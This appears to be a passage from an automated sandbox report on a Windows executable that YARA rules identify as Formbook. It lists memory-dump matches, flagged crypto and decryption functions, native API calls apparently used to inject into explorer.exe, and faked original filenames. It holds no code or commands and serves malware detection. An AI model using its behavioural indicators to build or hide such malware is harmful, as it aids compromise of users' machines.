Source: 00000010.00000002.509765743.0000000004E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.509765743.0000000004E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.373929378.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.373929378.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Uses 32bit PE files
Source: tlBHrCrteFXy8Jz.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Yara signature match
Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.tlBHrCrteFXy8Jz.exe.445b350.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.tlBHrCrteFXy8Jz.exe.445b350.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.tlBHrCrteFXy8Jz.exe.44b2170.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.tlBHrCrteFXy8Jz.exe.44b2170.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000000.358128872.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.358128872.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.299250808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.299250808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.510355464.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.510355464.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.373779572.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.373779572.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.509514447.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.509514447.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000000.337152454.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.337152454.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.304067071.0000000004319000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.304067071.0000000004319000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.299753354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.299753354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.372769249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.372769249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.509765743.0000000004E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.509765743.0000000004E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.373929378.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.373929378.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 0_2_019672B8 0_2_019672B8
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 0_2_019672F8 0_2_019672F8
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 0_2_019672E8 0_2_019672E8
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 0_2_0196753B 0_2_0196753B
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 0_2_01967548 0_2_01967548
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_0041C024 11_2_0041C024
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_00401026 11_2_00401026
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_00401030 11_2_00401030
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_0041B8B6 11_2_0041B8B6
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_0041C171 11_2_0041C171
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_0041C903 11_2_0041C903
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_0041D273 11_2_0041D273
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_00408C6C 11_2_00408C6C
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_00408C70 11_2_00408C70
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_00402D90 11_2_00402D90
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_0041CED1 11_2_0041CED1
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_0041BF44 11_2_0041BF44
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_0041BF77 11_2_0041BF77
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_0041C700 11_2_0041C700
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_00402FB0 11_2_00402FB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05210D20 16_2_05210D20
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E2D07 16_2_052E2D07
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E1D55 16_2_052E1D55
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05242581 16_2_05242581
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0522D5E0 16_2_0522D5E0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E25DD 16_2_052E25DD
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0522841F 16_2_0522841F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052DD466 16_2_052DD466
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E1FF1 16_2_052E1FF1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052EDFCE 16_2_052EDFCE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05236E30 16_2_05236E30
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052DD616 16_2_052DD616
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E2EF7 16_2_052E2EF7
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05234120 16_2_05234120
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0521F900 16_2_0521F900
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052399BF 16_2_052399BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052EE824 16_2_052EE824
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523A830 16_2_0523A830
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D1002 16_2_052D1002
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052420A0 16_2_052420A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E20A8 16_2_052E20A8
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0522B090 16_2_0522B090
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E28EC 16_2_052E28EC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E2B28 16_2_052E2B28
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523AB40 16_2_0523AB40
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524EBB0 16_2_0524EBB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D03DA 16_2_052D03DA
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052DDBD2 16_2_052DDBD2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052CFA2B 16_2_052CFA2B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E22AE 16_2_052E22AE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F9D271 16_2_02F9D271
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F9B8B6 16_2_02F9B8B6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F9C903 16_2_02F9C903
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F9CED1 16_2_02F9CED1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F82FB0 16_2_02F82FB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F88C70 16_2_02F88C70
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F88C6C 16_2_02F88C6C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F82D90 16_2_02F82D90
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 0521B150 appears 72 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_004185D0 NtCreateFile, 11_2_004185D0
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_00418680 NtReadFile, 11_2_00418680
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_00418700 NtClose, 11_2_00418700
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_004187B0 NtAllocateVirtualMemory, 11_2_004187B0
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_0041882A NtAllocateVirtualMemory, 11_2_0041882A
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_0041872A NtReadFile, 11_2_0041872A
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 11_2_004187AA NtAllocateVirtualMemory, 11_2_004187AA
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05259540 NtReadFile,LdrInitializeThunk, 16_2_05259540
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052595D0 NtClose,LdrInitializeThunk, 16_2_052595D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05259710 NtQueryInformationToken,LdrInitializeThunk, 16_2_05259710
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05259780 NtMapViewOfSection,LdrInitializeThunk, 16_2_05259780
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05259FE0 NtCreateMutant,LdrInitializeThunk, 16_2_05259FE0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05259660 NtAllocateVirtualMemory,LdrInitializeThunk, 16_2_05259660
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05259650 NtQueryValueKey,LdrInitializeThunk, 16_2_05259650
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052596E0 NtFreeVirtualMemory,LdrInitializeThunk, 16_2_052596E0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052596D0 NtCreateKey,LdrInitializeThunk, 16_2_052596D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05259910 NtAdjustPrivilegesToken,LdrInitializeThunk, 16_2_05259910
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052599A0 NtCreateSection,LdrInitializeThunk, 16_2_052599A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05259860 NtQuerySystemInformation,LdrInitializeThunk, 16_2_05259860
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05259840 NtDelayExecution,LdrInitializeThunk, 16_2_05259840
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05259A50 NtCreateFile,LdrInitializeThunk, 16_2_05259A50
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05259520 NtWaitForSingleObject, 16_2_05259520
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0525AD30 NtSetContextThread, 16_2_0525AD30
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05259560 NtWriteFile, 16_2_05259560
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052595F0 NtQueryInformationFile, 16_2_052595F0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05259730 NtQueryVirtualMemory, 16_2_05259730
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0525A710 NtOpenProcessToken, 16_2_0525A710
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05259760 NtOpenProcess, 16_2_05259760
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0525A770 NtOpenThread, 16_2_0525A770
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05259770 NtSetInformationFile, 16_2_05259770
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052597A0 NtUnmapViewOfSection, 16_2_052597A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05259610 NtEnumerateValueKey, 16_2_05259610
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05259670 NtQueryInformationProcess, 16_2_05259670
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05259950 NtQueueApcThread, 16_2_05259950
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052599D0 NtCreateProcessEx, 16_2_052599D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05259820 NtEnumerateKey, 16_2_05259820
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0525B040 NtSuspendThread, 16_2_0525B040
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052598A0 NtWriteVirtualMemory, 16_2_052598A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052598F0 NtReadVirtualMemory, 16_2_052598F0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05259B00 NtSetValueKey, 16_2_05259B00
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0525A3B0 NtGetContextThread, 16_2_0525A3B0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05259A20 NtResumeThread, 16_2_05259A20
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05259A00 NtProtectVirtualMemory, 16_2_05259A00
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05259A10 NtQuerySection, 16_2_05259A10
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05259A80 NtOpenDirectoryObject, 16_2_05259A80
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F98680 NtReadFile, 16_2_02F98680
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F987B0 NtAllocateVirtualMemory, 16_2_02F987B0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F98700 NtClose, 16_2_02F98700
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F985D0 NtCreateFile, 16_2_02F985D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F9882A NtAllocateVirtualMemory, 16_2_02F9882A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F987AA NtAllocateVirtualMemory, 16_2_02F987AA
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_02F9872A NtReadFile, 16_2_02F9872A
Sample file is different than original file name gathered from version info
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.307080980.0000000008400000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameUI.dllF vs tlBHrCrteFXy8Jz.exe
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.304067071.0000000004319000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUI.dllF vs tlBHrCrteFXy8Jz.exe
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000000.239279305.0000000000FC6000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameASCIIEncodi.exe4 vs tlBHrCrteFXy8Jz.exe
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.306944655.0000000008160000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameSafeSerializationManager.dll: vs tlBHrCrteFXy8Jz.exe
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.303068640.00000000033C9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSafeSerializationManager.dll: vs tlBHrCrteFXy8Jz.exe
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.302842278.000000000336C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameASCIIEncodi.exe4 vs tlBHrCrteFXy8Jz.exe
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.302842278.000000000336C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs tlBHrCrteFXy8Jz.exe
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.302842278.000000000336C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: m,\\StringFileInfo\\000004B0\\OriginalFilename vs tlBHrCrteFXy8Jz.exe
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs tlBHrCrteFXy8Jz.exe
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSafeSerializationManager.dll: vs tlBHrCrteFXy8Jz.exe
Source: tlBHrCrteFXy8Jz.exe, 0000000B.00000000.298589322.0000000000AE6000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameASCIIEncodi.exe4 vs tlBHrCrteFXy8Jz.exe
